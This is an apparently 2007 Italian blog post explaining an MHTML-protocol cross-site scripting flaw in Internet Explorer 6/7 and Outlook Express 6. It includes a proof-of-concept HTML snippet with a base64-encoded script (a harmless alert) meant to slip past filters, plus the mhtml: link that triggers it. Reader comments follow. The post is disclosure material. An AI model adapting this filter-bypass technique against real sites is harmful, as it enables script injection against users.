Esecuzione di codice arbitrario attraverso il protocollo MHTML e Internet Explorer 6/7

In Internet Explorer, attraverso il protocollo mhtml e usando alcune caratteristiche di Outlook Express, alcune risorse (tipo: HTML, immagini, file di applicazioni etc) possono essere aperte come file MHTML formattati dimenticando il loro Content-Type dando la possibilità di eseguire del codice arbitrario sul computer vittima (es. XSS).

Le versione affette da questo problema sono:

Outlook Express 6 / Internet Explorer 6 / Internet Explorer 7

Aprendo un file ad esempio html contenente il seguente codice:

<html><body><div>
<!-- begin of input from user(escaped properly as HTML) -->
Subject: test
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: base64

PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTs8L3NjcmlwdD4NCjwv
aHRtbD4NCg==
<!-- end of input -->
</div></html>

attraverso un link del tipo:

mhtml: http://example.com/test.html

Si aprirà la risorsa senza che l’header venga letto, eseguendo il codice codificato su base64 per bypassare i filtri. il codice (es. XSS)

Maggiori info: http://openmya.hacker.jp/hasegawa/security/ms07-034.txt

  • Print this article!
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Technotizie
  • FriendFeed
  • IndianPad
  • Live
  • Netvibes
  • Netvouz
  • NewsVine
  • Reddit
  • Segnalo
  • Slashdot
  • StumbleUpon
  • Twitter
  • Yahoo! Bookmarks

Commenti

  1. 4 comments su “Esecuzione di codice arbitrario attraverso il protocollo MHTML e Internet Explorer 6/7”

  1. Non mi riesce di contattarti su technotizie, il codice verifica mi butta sempre fuori, comunque: Non riesco a postare; dice errore quesry 2…. Io il Mio dovere l’ho fatto, ciao PS: Ho controllato fa lo stesso scherzo sia con la tool di firefox che entrando e ‘proponendo’ normalmente la notizia, ciao!

    Posted by Blogmasterpg | Giugno 27, 2007, 17:38
  2. Massy, ti chiederei gentilmente di essere più preciso al riguardo. A me sembra che tutto funzioni correttamente. Non ho ricevuto segnalazioni al riguardo oltre la tua.

    Posted by admin | Giugno 27, 2007, 19:47
  3. Trovato bug e corretto. Grazie Massy ;)

    Posted by admin | Giugno 28, 2007, 12:31
  4. CATANIA – 18/GENNAIO/2011.-

    PERCHE NON POSSO APRIRE TUTTI I FILES MHTML SCARICATI DA EMAILS???
    NON NE POSSO PIU………………….’ – POSSO ANNULLARE QUESTO DIFETTO DI GOOGLE??
    PREGO RISPONDERMI SUBITO.- A.BRUNETTI.-
    ************************************************************

    Posted by AFB | Gennaio 18, 2011, 16:40

Inserisci un commento